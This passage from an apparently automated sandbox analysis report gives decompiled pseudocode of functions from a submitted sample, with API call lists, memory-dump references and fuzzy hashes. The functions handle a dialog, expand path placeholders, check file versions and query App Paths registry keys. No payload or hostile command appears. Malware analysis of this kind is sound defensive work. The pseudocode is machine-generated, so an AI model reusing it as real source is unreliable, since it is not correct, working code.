                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: FreeLibrary$AddressAllocateInitializeLoadProc
                                                                                                                                                                                                                                            • String ID: CheckTokenMembership$advapi32.dll
                                                                                                                                                                                                                                            • API String ID: 4204503880-1888249752
                                                                                                                                                                                                                                            • Opcode ID: fff1ca206554b5e6cb19032936a601839e3c8dd0f831d88a43a5b354ab305b0b
                                                                                                                                                                                                                                            • Instruction ID: a854b3992ff76caf4ad4841ead9899596d439c5fcea838a74d848b4c18ffdd12
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: fff1ca206554b5e6cb19032936a601839e3c8dd0f831d88a43a5b354ab305b0b
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7A11B631E00219AFDB129FA4ED4AABEBB7CEF44701F11416DFA01E3290DB709D058B91
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E00323450(struct HWND__* _a4, intOrPtr _a8, int _a12) {
                                                                                                                                                                                                                                            				void* _t7;
                                                                                                                                                                                                                                            				void* _t11;
                                                                                                                                                                                                                                            				struct HWND__* _t12;
                                                                                                                                                                                                                                            				int _t22;
                                                                                                                                                                                                                                            				struct HWND__* _t24;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t7 = _a8 - 0x10;
                                                                                                                                                                                                                                            				if(_t7 == 0) {
                                                                                                                                                                                                                                            					EndDialog(_a4, 2);
                                                                                                                                                                                                                                            					L11:
                                                                                                                                                                                                                                            					return 1;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t11 = _t7 - 0x100;
                                                                                                                                                                                                                                            				if(_t11 == 0) {
                                                                                                                                                                                                                                            					_t12 = GetDesktopWindow();
                                                                                                                                                                                                                                            					_t24 = _a4;
                                                                                                                                                                                                                                            					E003243D0(_t24, _t12);
                                                                                                                                                                                                                                            					SetWindowTextA(_t24, "cent");
                                                                                                                                                                                                                                            					SetDlgItemTextA(_t24, 0x838,  *0x329404);
                                                                                                                                                                                                                                            					SetForegroundWindow(_t24);
                                                                                                                                                                                                                                            					goto L11;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				if(_t11 == 1) {
                                                                                                                                                                                                                                            					_t22 = _a12;
                                                                                                                                                                                                                                            					if(_t22 < 6) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 <= 7) {
                                                                                                                                                                                                                                            						L8:
                                                                                                                                                                                                                                            						EndDialog(_a4, _t22);
                                                                                                                                                                                                                                            						return 1;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					if(_t22 != 0x839) {
                                                                                                                                                                                                                                            						goto L11;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *0x3291dc = 1;
                                                                                                                                                                                                                                            					goto L8;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                                            0x00323459
                                                                                                                                                                                                                                            0x0032345c
                                                                                                                                                                                                                                            0x003234d8
                                                                                                                                                                                                                                            0x003234de
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003234e0
                                                                                                                                                                                                                                            0x0032345e
                                                                                                                                                                                                                                            0x00323463
                                                                                                                                                                                                                                            0x0032349a
                                                                                                                                                                                                                                            0x003234a0
                                                                                                                                                                                                                                            0x003234a7
                                                                                                                                                                                                                                            0x003234b2
                                                                                                                                                                                                                                            0x003234c4
                                                                                                                                                                                                                                            0x003234cb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003234cb
                                                                                                                                                                                                                                            0x00323468
                                                                                                                                                                                                                                            0x0032346e
                                                                                                                                                                                                                                            0x00323474
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032347c
                                                                                                                                                                                                                                            0x0032348c
                                                                                                                                                                                                                                            0x00323490
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323496
                                                                                                                                                                                                                                            0x00323484
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323486
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00323486
                                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • EndDialog.USER32(?,?), ref: 00323490
                                                                                                                                                                                                                                            • GetDesktopWindow.USER32 ref: 0032349A
                                                                                                                                                                                                                                            • SetWindowTextA.USER32(?,cent), ref: 003234B2
                                                                                                                                                                                                                                            • SetDlgItemTextA.USER32(?,00000838), ref: 003234C4
                                                                                                                                                                                                                                            • SetForegroundWindow.USER32(?), ref: 003234CB
                                                                                                                                                                                                                                            • EndDialog.USER32(?,00000002), ref: 003234D8
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Window$DialogText$DesktopForegroundItem
                                                                                                                                                                                                                                            • String ID: cent
                                                                                                                                                                                                                                            • API String ID: 852535152-3940384054
                                                                                                                                                                                                                                            • Opcode ID: be6fd996d1b4756196aa7f0d45156a37e811f33b80631e2c16f91c331e0d2ba2
                                                                                                                                                                                                                                            • Instruction ID: b5372bd99784dc7301c7c0ee0418aee0bfd2d2255e621087a9c52ef5f17fa4af
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: be6fd996d1b4756196aa7f0d45156a37e811f33b80631e2c16f91c331e0d2ba2
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5E01D431240538ABC72B6F66FC0C96D3B69EB05B10F124059F946969A0CB38AF63CBC1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 95%
                                                                                                                                                                                                                                            			E00322AAC(CHAR* __ecx, char* __edx, CHAR* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                                            				int _t21;
                                                                                                                                                                                                                                            				char _t32;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				char* _t38;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				intOrPtr* _t55;
                                                                                                                                                                                                                                            				CHAR* _t59;
                                                                                                                                                                                                                                            				void* _t62;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				CHAR* _t65;
                                                                                                                                                                                                                                            				signed int _t66;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t60 = __edx;
                                                                                                                                                                                                                                            				_t16 =  *0x328004; // 0x2c4b51c8
                                                                                                                                                                                                                                            				_t17 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_v8 = _t16 ^ _t66;
                                                                                                                                                                                                                                            				_t65 = _a4;
                                                                                                                                                                                                                                            				_t44 = __edx;
                                                                                                                                                                                                                                            				_t64 = __ecx;
                                                                                                                                                                                                                                            				if( *((char*)(__ecx)) != 0) {
                                                                                                                                                                                                                                            					GetModuleFileNameA( *0x329a3c,  &_v268, 0x104);
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_t17 =  *_t64;
                                                                                                                                                                                                                                            						if(_t17 == 0) {
                                                                                                                                                                                                                                            							break;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t21 = IsDBCSLeadByte(_t17);
                                                                                                                                                                                                                                            						 *_t65 =  *_t64;
                                                                                                                                                                                                                                            						if(_t21 != 0) {
                                                                                                                                                                                                                                            							_t65[1] = _t64[1];
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if( *_t64 != 0x23) {
                                                                                                                                                                                                                                            							L19:
                                                                                                                                                                                                                                            							_t65 = CharNextA(_t65);
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            							if(CharUpperA( *_t64) != 0x44) {
                                                                                                                                                                                                                                            								if(CharUpperA( *_t64) != 0x45) {
                                                                                                                                                                                                                                            									if( *_t64 == 0x23) {
                                                                                                                                                                                                                                            										goto L19;
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                                            									E00321680(_t65, E003217C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            									_t52 = _t65;
                                                                                                                                                                                                                                            									_t14 =  &(_t52[1]); // 0x2
                                                                                                                                                                                                                                            									_t60 = _t14;
                                                                                                                                                                                                                                            									do {
                                                                                                                                                                                                                                            										_t32 =  *_t52;
                                                                                                                                                                                                                                            										_t52 =  &(_t52[1]);
                                                                                                                                                                                                                                            									} while (_t32 != 0);
                                                                                                                                                                                                                                            									goto L17;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								E003265E8( &_v268);
                                                                                                                                                                                                                                            								_t55 =  &_v268;
                                                                                                                                                                                                                                            								_t62 = _t55 + 1;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t34 =  *_t55;
                                                                                                                                                                                                                                            									_t55 = _t55 + 1;
                                                                                                                                                                                                                                            								} while (_t34 != 0);
                                                                                                                                                                                                                                            								_t38 = CharPrevA( &_v268,  &(( &_v268)[_t55 - _t62]));
                                                                                                                                                                                                                                            								if(_t38 != 0 &&  *_t38 == 0x5c) {
                                                                                                                                                                                                                                            									 *_t38 = 0;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								E00321680(_t65, E003217C8(_t44, _t65),  &_v268);
                                                                                                                                                                                                                                            								_t59 = _t65;
                                                                                                                                                                                                                                            								_t12 =  &(_t59[1]); // 0x2
                                                                                                                                                                                                                                            								_t60 = _t12;
                                                                                                                                                                                                                                            								do {
                                                                                                                                                                                                                                            									_t42 =  *_t59;
                                                                                                                                                                                                                                            									_t59 =  &(_t59[1]);
                                                                                                                                                                                                                                            								} while (_t42 != 0);
                                                                                                                                                                                                                                            								L17:
                                                                                                                                                                                                                                            								_t65 =  &(_t65[_t52 - _t60]);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t64 = CharNextA(_t64);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					 *_t65 = _t17;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00326CE0(_t17, _t44, _v8 ^ _t66, _t60, _t64, _t65);
                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                            0x00322aac
                                                                                                                                                                                                                                            0x00322ab7
                                                                                                                                                                                                                                            0x00322abc
                                                                                                                                                                                                                                            0x00322abe
                                                                                                                                                                                                                                            0x00322ac3
                                                                                                                                                                                                                                            0x00322ac6
                                                                                                                                                                                                                                            0x00322ac9
                                                                                                                                                                                                                                            0x00322ace
                                                                                                                                                                                                                                            0x00322ae6
                                                                                                                                                                                                                                            0x00322bdc
                                                                                                                                                                                                                                            0x00322bdc
                                                                                                                                                                                                                                            0x00322be0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322af2
                                                                                                                                                                                                                                            0x00322afc
                                                                                                                                                                                                                                            0x00322b00
                                                                                                                                                                                                                                            0x00322b05
                                                                                                                                                                                                                                            0x00322b05
                                                                                                                                                                                                                                            0x00322b0b
                                                                                                                                                                                                                                            0x00322bca
                                                                                                                                                                                                                                            0x00322bd1
                                                                                                                                                                                                                                            0x00322b11
                                                                                                                                                                                                                                            0x00322b18
                                                                                                                                                                                                                                            0x00322b26
                                                                                                                                                                                                                                            0x00322b99
                                                                                                                                                                                                                                            0x00322bc8
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322b9b
                                                                                                                                                                                                                                            0x00322bae
                                                                                                                                                                                                                                            0x00322bb3
                                                                                                                                                                                                                                            0x00322bb5
                                                                                                                                                                                                                                            0x00322bb5
                                                                                                                                                                                                                                            0x00322bb8
                                                                                                                                                                                                                                            0x00322bb8
                                                                                                                                                                                                                                            0x00322bba
                                                                                                                                                                                                                                            0x00322bbb
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322bb8
                                                                                                                                                                                                                                            0x00322b28
                                                                                                                                                                                                                                            0x00322b2e
                                                                                                                                                                                                                                            0x00322b33
                                                                                                                                                                                                                                            0x00322b39
                                                                                                                                                                                                                                            0x00322b3c
                                                                                                                                                                                                                                            0x00322b3c
                                                                                                                                                                                                                                            0x00322b3e
                                                                                                                                                                                                                                            0x00322b3f
                                                                                                                                                                                                                                            0x00322b55
                                                                                                                                                                                                                                            0x00322b5d
                                                                                                                                                                                                                                            0x00322b64
                                                                                                                                                                                                                                            0x00322b64
                                                                                                                                                                                                                                            0x00322b7a
                                                                                                                                                                                                                                            0x00322b7f
                                                                                                                                                                                                                                            0x00322b81
                                                                                                                                                                                                                                            0x00322b81
                                                                                                                                                                                                                                            0x00322b84
                                                                                                                                                                                                                                            0x00322b84
                                                                                                                                                                                                                                            0x00322b86
                                                                                                                                                                                                                                            0x00322b87
                                                                                                                                                                                                                                            0x00322bbf
                                                                                                                                                                                                                                            0x00322bc1
                                                                                                                                                                                                                                            0x00322bc1
                                                                                                                                                                                                                                            0x00322b26
                                                                                                                                                                                                                                            0x00322bda
                                                                                                                                                                                                                                            0x00322bda
                                                                                                                                                                                                                                            0x00322be6
                                                                                                                                                                                                                                            0x00322be6
                                                                                                                                                                                                                                            0x00322bf8

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GetModuleFileNameA.KERNEL32(?,00000104,00000000,00000000,?), ref: 00322AE6
                                                                                                                                                                                                                                            • IsDBCSLeadByte.KERNEL32(00000000), ref: 00322AF2
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 00322B12
                                                                                                                                                                                                                                            • CharUpperA.USER32 ref: 00322B1E
                                                                                                                                                                                                                                            • CharPrevA.USER32(?,?), ref: 00322B55
                                                                                                                                                                                                                                            • CharNextA.USER32(?), ref: 00322BD4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000001.00000002.346665107.0000000000321000.00000020.00000001.01000000.00000004.sdmp, Offset: 00320000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346646404.0000000000320000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346683392.0000000000328000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000001.00000002.346696832.000000000032C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_1_2_320000_sEm51bM.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$Next$ByteFileLeadModuleNamePrevUpper
                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                            • API String ID: 571164536-0
                                                                                                                                                                                                                                            • Opcode ID: 92b8c4f1835360c2ec7cb6a8b4b1456bf50967d7029bad223aa4c62d4a495399
                                                                                                                                                                                                                                            • Instruction ID: 8f42c98fa6c003f811cd2757924b5e8efac76b890525bfd2f8f58ca636ac24eb
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 92b8c4f1835360c2ec7cb6a8b4b1456bf50967d7029bad223aa4c62d4a495399
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E24135341082656FDF279F34AC04AFE7BAD9F56310F05009EE8C287202DB355E86CBA1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                            			E003228E8(intOrPtr __ecx, char* __edx, intOrPtr* _a8) {
                                                                                                                                                                                                                                            				void* _v8;
                                                                                                                                                                                                                                            				char* _v12;
                                                                                                                                                                                                                                            				intOrPtr _v16;
                                                                                                                                                                                                                                            				void* _v20;
                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                            				int _v28;
                                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                                            				void* _v36;
                                                                                                                                                                                                                                            				int _v40;
                                                                                                                                                                                                                                            				void* _v44;
                                                                                                                                                                                                                                            				intOrPtr _v48;
                                                                                                                                                                                                                                            				intOrPtr _v52;
                                                                                                                                                                                                                                            				intOrPtr _v56;
                                                                                                                                                                                                                                            				intOrPtr _v60;
                                                                                                                                                                                                                                            				intOrPtr _v64;
                                                                                                                                                                                                                                            				long _t68;
                                                                                                                                                                                                                                            				void* _t70;
                                                                                                                                                                                                                                            				void* _t73;
                                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                                            				void* _t83;
                                                                                                                                                                                                                                            				void* _t87;
                                                                                                                                                                                                                                            				void* _t88;
                                                                                                                                                                                                                                            				intOrPtr _t93;
                                                                                                                                                                                                                                            				intOrPtr _t97;
                                                                                                                                                                                                                                            				intOrPtr _t99;
                                                                                                                                                                                                                                            				int _t101;
                                                                                                                                                                                                                                            				void* _t103;
                                                                                                                                                                                                                                            				void* _t106;
                                                                                                                                                                                                                                            				void* _t109;
                                                                                                                                                                                                                                            				void* _t110;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_v12 = __edx;
                                                                                                                                                                                                                                            				_t99 = __ecx;
                                                                                                                                                                                                                                            				_t106 = 0;
                                                                                                                                                                                                                                            				_v16 = __ecx;
                                                                                                                                                                                                                                            				_t87 = 0;
                                                                                                                                                                                                                                            				_t103 = 0;
                                                                                                                                                                                                                                            				_v20 = 0;
                                                                                                                                                                                                                                            				if( *((intOrPtr*)(__ecx + 0x7c)) <= 0) {
                                                                                                                                                                                                                                            					L19:
                                                                                                                                                                                                                                            					_t106 = 1;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t62 = 0;
                                                                                                                                                                                                                                            					_v8 = 0;
                                                                                                                                                                                                                                            					while(1) {
                                                                                                                                                                                                                                            						_v24 =  *((intOrPtr*)(_t99 + 0x80));
                                                                                                                                                                                                                                            						if(E00322773(_v12,  *((intOrPtr*)(_t62 + _t99 +  *((intOrPtr*)(_t99 + 0x80)) + 0xbc)) + _t99 + 0x84) == 0) {
                                                                                                                                                                                                                                            							goto L20;
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t11 =  &_v32; // 0x323938
                                                                                                                                                                                                                                            						_t68 = GetFileVersionInfoSizeA(_v12, _t11);
                                                                                                                                                                                                                                            						_v28 = _t68;
                                                                                                                                                                                                                                            						if(_t68 == 0) {
                                                                                                                                                                                                                                            							_t99 = _v16;
                                                                                                                                                                                                                                            							_t70 = _v8 + _t99;
                                                                                                                                                                                                                                            							_t93 = _v24;
                                                                                                                                                                                                                                            							_t87 = _v20;
                                                                                                                                                                                                                                            							if( *((intOrPtr*)(_t70 + _t93 + 0x84)) == _t106 &&  *((intOrPtr*)(_t70 + _t93 + 0x88)) == _t106) {
                                                                                                                                                                                                                                            								goto L18;
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_t103 = GlobalAlloc(0x42, _t68);
                                                                                                                                                                                                                                            							if(_t103 != 0) {
                                                                                                                                                                                                                                            								_t73 = GlobalLock(_t103);
                                                                                                                                                                                                                                            								_v36 = _t73;
                                                                                                                                                                                                                                            								if(_t73 != 0) {
                                                                                                                                                                                                                                            									_t16 =  &_v32; // 0x323938
                                                                                                                                                                                                                                            									if(GetFileVersionInfoA(_v12,  *_t16, _v28, _t73) == 0 || VerQueryValueA(_v36, "\\",  &_v44,  &_v40) == 0 || _v40 == 0) {
                                                                                                                                                                                                                                            										L15:
                                                                                                                                                                                                                                            										GlobalUnlock(_t103);
                                                                                                                                                                                                                                            										_t99 = _v16;
                                                                                                                                                                                                                                            										L18:
                                                                                                                                                                                                                                            										_t87 = _t87 + 1;
                                                                                                                                                                                                                                            										_t62 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										_v20 = _t87;
                                                                                                                                                                                                                                            										_v8 = _v8 + 0x3c;
                                                                                                                                                                                                                                            										if(_t87 <  *((intOrPtr*)(_t99 + 0x7c))) {
                                                                                                                                                                                                                                            											continue;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L19;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										_t79 = _v44;
                                                                                                                                                                                                                                            										_t88 = _t106;
                                                                                                                                                                                                                                            										_v28 =  *((intOrPtr*)(_t79 + 0xc));
                                                                                                                                                                                                                                            										_t101 = _v28;
                                                                                                                                                                                                                                            										_v48 =  *((intOrPtr*)(_t79 + 8));
                                                                                                                                                                                                                                            										_t83 = _v8 + _v16 + _v24 + 0x94;
                                                                                                                                                                                                                                            										_t97 = _v48;
                                                                                                                                                                                                                                            										_v36 = _t83;
                                                                                                                                                                                                                                            										_t109 = _t83;
                                                                                                                                                                                                                                            										do {
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x34)) = E00322A89(_t97, _t101,  *((intOrPtr*)(_t109 - 0x10)),  *((intOrPtr*)(_t109 - 0xc)));
                                                                                                                                                                                                                                            											 *((intOrPtr*)(_t110 + _t88 - 0x3c)) = E00322A89(_t97, _t101,  *((intOrPtr*)(_t109 - 4)),  *_t109);
                                                                                                                                                                                                                                            											_t109 = _t109 + 0x18;
                                                                                                                                                                                                                                            											_t88 = _t88 + 4;
                                                                                                                                                                                                                                            										} while (_t88 < 8);
                                                                                                                                                                                                                                            										_t87 = _v20;
                                                                                                                                                                                                                                            										_t106 = 0;
                                                                                                                                                                                                                                            										if(_v56 < 0 || _v64 > 0) {
                                                                                                                                                                                                                                            											if(_v52 < _t106 || _v60 > _t106) {
                                                                                                                                                                                                                                            												GlobalUnlock(_t103);
                                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                                            												goto L15;
                                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											goto L15;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						goto L20;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				L20:
                                                                                                                                                                                                                                            				 *_a8 = _t87;
                                                                                                                                                                                                                                            				if(_t103 != 0) {
                                                                                                                                                                                                                                            					GlobalFree(_t103);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return _t106;
                                                                                                                                                                                                                                            			}

































                                                                                                                                                                                                                                            0x003228f1
                                                                                                                                                                                                                                            0x003228f4
                                                                                                                                                                                                                                            0x003228f7
                                                                                                                                                                                                                                            0x003228f9
                                                                                                                                                                                                                                            0x003228fc
                                                                                                                                                                                                                                            0x003228ff
                                                                                                                                                                                                                                            0x00322901
                                                                                                                                                                                                                                            0x00322907
                                                                                                                                                                                                                                            0x00322a62
                                                                                                                                                                                                                                            0x00322a64
                                                                                                                                                                                                                                            0x0032290d
                                                                                                                                                                                                                                            0x0032290d
                                                                                                                                                                                                                                            0x0032290f
                                                                                                                                                                                                                                            0x00322912
                                                                                                                                                                                                                                            0x00322920
                                                                                                                                                                                                                                            0x00322937
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032293d
                                                                                                                                                                                                                                            0x00322944
                                                                                                                                                                                                                                            0x0032294a
                                                                                                                                                                                                                                            0x0032294f
                                                                                                                                                                                                                                            0x00322a2f
                                                                                                                                                                                                                                            0x00322a32
                                                                                                                                                                                                                                            0x00322a34
                                                                                                                                                                                                                                            0x00322a37
                                                                                                                                                                                                                                            0x00322a41
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322955
                                                                                                                                                                                                                                            0x0032295e
                                                                                                                                                                                                                                            0x00322962
                                                                                                                                                                                                                                            0x00322969
                                                                                                                                                                                                                                            0x0032296f
                                                                                                                                                                                                                                            0x00322974
                                                                                                                                                                                                                                            0x0032297e
                                                                                                                                                                                                                                            0x0032298c
                                                                                                                                                                                                                                            0x00322a20
                                                                                                                                                                                                                                            0x00322a21
                                                                                                                                                                                                                                            0x00322a27
                                                                                                                                                                                                                                            0x00322a4c
                                                                                                                                                                                                                                            0x00322a4f
                                                                                                                                                                                                                                            0x00322a50
                                                                                                                                                                                                                                            0x00322a53
                                                                                                                                                                                                                                            0x00322a56
                                                                                                                                                                                                                                            0x00322a5c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x003229b2
                                                                                                                                                                                                                                            0x003229b2
                                                                                                                                                                                                                                            0x003229b5
                                                                                                                                                                                                                                            0x003229bd
                                                                                                                                                                                                                                            0x003229c3
                                                                                                                                                                                                                                            0x003229cc
                                                                                                                                                                                                                                            0x003229d5
                                                                                                                                                                                                                                            0x003229d7
                                                                                                                                                                                                                                            0x003229da
                                                                                                                                                                                                                                            0x003229dd
                                                                                                                                                                                                                                            0x003229df
                                                                                                                                                                                                                                            0x003229ec
                                                                                                                                                                                                                                            0x003229f8
                                                                                                                                                                                                                                            0x003229fc
                                                                                                                                                                                                                                            0x003229ff
                                                                                                                                                                                                                                            0x00322a02
                                                                                                                                                                                                                                            0x00322a07
                                                                                                                                                                                                                                            0x00322a0a
                                                                                                                                                                                                                                            0x00322a0f
                                                                                                                                                                                                                                            0x00322a19
                                                                                                                                                                                                                                            0x00322a81
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00322a0f
                                                                                                                                                                                                                                            0x0032298c
                                                                                                                                                                                                                                            0x00322974
                                                                                                                                                                                                                                            0x00322962
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x0032294f
                                                                                                                                                                                                                                            0x00322912
                                                                                                                                                                                                                                            0x00322a65
                                                                                                                                                                                                                                            0x00322a68
                                                                                                                                                                                                                                            0x00322a6c
                                                                                                                                                                                                                                            0x00322a6f
                                                                                                                                                                                                                                            0x00322a6f
                                                                                                                                                                                                                                            0x00322a7d

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • GlobalFree.KERNEL32 ref: 00322A6F
                                                                                                                                                                                                                                              • Part of subcall function 00322773: CharUpperA.USER32(2C4B51C8,00000000,00000000,00000000), ref: 003227A8
                                                                                                                                                                                                                                              • Part of subcall function 00322773: CharNextA.USER32(0000054D), ref: 003227B5
                                                                                                                                                                                                                                              • Part of subcall function 00322773: CharNextA.USER32(00000000), ref: 003227BC
                                                                                                                                                                                                                                              • Part of subcall function 00322773: RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00322829
                                                                                                                                                                                                                                              • Part of subcall function 00322773: RegQueryValueExA.ADVAPI32(?,00321140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00322852
                                                                                                                                                                                                                                              • Part of subcall function 00322773: ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00322870
                                                                                                                                                                                                                                              • Part of subcall function 00322773: RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 003228A0
